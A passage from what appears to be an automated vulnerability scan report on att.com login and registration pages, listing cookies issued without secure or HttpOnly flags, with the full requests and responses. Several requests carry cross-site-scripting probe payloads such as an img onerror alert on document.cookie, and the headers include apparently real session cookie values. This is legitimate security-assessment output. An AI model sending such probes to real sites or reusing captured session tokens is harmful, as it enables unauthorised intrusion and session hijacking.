Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; browserid=A001533839947; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; TLTHID=EF42DE367124107128A6B78052916767; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie"
Content-Length: 9105
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:24:30 GMT
Connection: keep-alive
Set-Cookie: TLTHID=8039E25E71251071657CDF339FAEDDE3; path=/; domain=.att.com
Set-Cookie: EDOCSSESSIONID=vTT7N4lTTvfpG1Qk6pB5TMfBQMjm9bQQMTthL1yMDLfDVYW8rl8W!-2067242516; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
   <title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/registrationAction.olamexecute6579b"><img src=a onerror=alert(1)>6a711fed7d8">
...[SNIP]...

2. SSL cookie without secure flag set  previous  next
There are 5 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


2.1. https://www.att.com/olam/a  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.att.com
Path:   /olam/a

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /olam/a HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecuted4776%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E308930536fd?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-account-mgmt%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22N%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22https%3A%2F%2Fwww.att.com%2Folam%2FregistrationAction.olamexecute%22%2C%22pv%22%3A4%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%2C%22d2%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%2C%22d5%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A5%2C%22sd%22%3A5%7D; TLTHID=5893ADCE7126107198F1EED8C4C046B3; EDOCSSESSIONID=2FJ8N4nZNcBJz7zWkb4nGfTymqd6f1GdMLvSJZDxbFZfFfGDYwgC!725500378

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie"
Content-Length: 9030
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:32:35 GMT
Connection: keep-alive
Set-Cookie: TLTHID=A131519471261071B26E9E552188C3F4; path=/; domain=.att.com
Set-Cookie: EDOCSSESSIONID=FpjQN4nSSybv1Q21ZYL8TllH8fYsVJMhyvdqT5GBTPFnj1wBLXGC!-744530585; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
   <title
...[SNIP]...

2.2. https://www.att.com/olam/loginAction.olamexecute  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.att.com
Path:   /olam/loginAction.olamexecute

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /olam/loginAction.olamexecute?customerType=L HTTP/1.1
Host: www.att.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; browserid=A001533839947; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; TLTHID=EF42DE367124107128A6B78052916767; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie", no-store
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: -1
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2CLicense/0 ]
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:23:12 GMT
Connection: keep-alive
Set-Cookie: TLTHID=51FED87C712510718C76EED8C4C046B3; path=/; domain=.att.com
Set-Cookie: EDOCSSESSIONID=bcTFN4lQG1bh6jxwQH9J6WbgCPbbSR0clw6DkTqhl10gs7wvmsw1!725500378; path=/
Set-Cookie: stack=doammw31; path=/
Set-Cookie: colam_ctn=l%3Den_US; domain=.att.com; expires=Thursday, 26-Apr-2012 23:23:12 GMT; path=/
Set-Cookie: browserid=A001533839947; domain=.att.com; expires=Thursday, 26-Apr-2012 23:23:12 GMT; path=/
Content-Length: 57400


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


...[SNIP]...

2.3. https://www.att.com/olam/logout.olamexecute  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.att.com
Path:   /olam/logout.olamexecute

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /olam/logout.olamexecute HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; EDOCSSESSIONID=tYgVN4nK1nfNdRJZhy0ypsrD9ygDfXD1ySTF2yVvkQR5PmZBwTtL!-744530585; colam_ctn=l%3Den_US; TLTHID=83E4A0D271261071AF049E552188C3F4; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-account-mgmt%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22N%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22https%3A%2F%2Fwww.att.com%2Folam%2FloginAction.olamexecuted4776%5C%22%3E%3Cimg%20src%3Da%20onerror%3Dalert(document.cookie)%3E308930536fd%22%2C%22pv%22%3A5%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%2C%22d2%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%2C%22d5%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%2C%22e%22%3A2%7D%7D%2C%22cd%22%3A5%2C%22sd%22%3A5%7D

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie", no-store
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: -1
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2CLicense/0 ]
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:39:47 GMT
Connection: keep-alive
Set-Cookie: TLTHID=A313761C71271071C2539E552188C3F4; path=/; domain=.att.com
Set-Cookie: browserid=A001533839947; domain=.att.com; expires=Thursday, 26-Apr-2012 23:39:47 GMT; path=/
Set-Cookie: stack=doammw08; path=/
Set-Cookie: browserid=A001533839947; domain=.att.com; expires=Thursday, 26-Apr-2012 23:39:47 GMT; path=/
Set-Cookie: stack=doammw08; path=/
Set-Cookie: EDOCSSESSIONID=h0BxN4pDq3BVSNCXR6bvvmwLZFpCpyHGBPHnzkcykGGYhNS2ycG9!-744530585; path=/
Set-Cookie: stack=doammw08; path=/
Set-Cookie: colam_ctn=l%3Den_US; domain=.att.com; expires=Thursday, 26-Apr-2012 23:39:47 GMT; path=/
Set-Cookie: browserid=A001533839947; domain=.att.com; expires=Thursday, 26-Apr-2012 23:39:47 GMT; path=/
Set-Cookie: stack=doammw08; path=/
Content-Length: 57599


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


...[SNIP]...

2.4. https://www.att.com/olam/registrationAction.olamexecute  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.att.com
Path:   /olam/registrationAction.olamexecute

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /olam/registrationAction.olamexecute HTTP/1.1
Host: www.att.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; browserid=A001533839947; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; TLTHID=EF42DE367124107128A6B78052916767; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie", no-store
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: -1
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2CLicense/0 ]
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:23:17 GMT
Connection: keep-alive
Set-Cookie: TLTHID=54B4862A712510717B51952E259E14A2; path=/; domain=.att.com
Set-Cookie: EDOCSSESSIONID=1Xg6N4lFf66p8RzjmLVH6cygD59mH6qmpXs0hM6Jx6LyFSZH2Llj!2022867730; path=/
Set-Cookie: browserid=A001533839947; domain=.att.com; expires=Thursday, 26-Apr-2012 23:23:17 GMT; path=/
Set-Cookie: stack=p1eam1m6; path=/
Content-Length: 31527


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


...[SNIP]...

2.5. https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/jsp/tiles/common_includes/cGateCookie.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /olam/jsp/tiles/common_includes/cGateCookie.jsp?userType=&isLogout= HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946630070

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 530
Content-Type: text/html; charset=UTF-8
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2CLicense/0 ]
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:23:42 GMT
Connection: keep-alive
Set-Cookie: TLTHID=638F77867125107191D59E552188C3F4; path=/; domain=.att.com


<html>
   <body>
       <form name="myForm">
        <input type="hidden" name="userid" size="20" />
        <input type="hidden" name="passwor
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next
There are 5 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



3.1. https://www.att.com/olam/a  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.att.com
Path:   /olam/a

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /olam/a HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecuted4776%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E308930536fd?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-account-mgmt%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22N%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22https%3A%2F%2Fwww.att.com%2Folam%2FregistrationAction.olamexecute%22%2C%22pv%22%3A4%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%2C%22d2%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%2C%22d5%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A5%2C%22sd%22%3A5%7D; TLTHID=5893ADCE7126107198F1EED8C4C046B3; EDOCSSESSIONID=2FJ8N4nZNcBJz7zWkb4nGfTymqd6f1GdMLvSJZDxbFZfFfGDYwgC!725500378

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie"
Content-Length: 9030
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:32:35 GMT
Connection: keep-alive
Set-Cookie: TLTHID=A131519471261071B26E9E552188C3F4; path=/; domain=.att.com
Set-Cookie: EDOCSSESSIONID=FpjQN4nSSybv1Q21ZYL8TllH8fYsVJMhyvdqT5GBTPFnj1wBLXGC!-744530585; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
   <title
...[SNIP]...

3.2. https://www.att.com/olam/loginAction.olamexecute  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.att.com
Path:   /olam/loginAction.olamexecute

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /olam/loginAction.olamexecute?customerType=L HTTP/1.1
Host: www.att.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
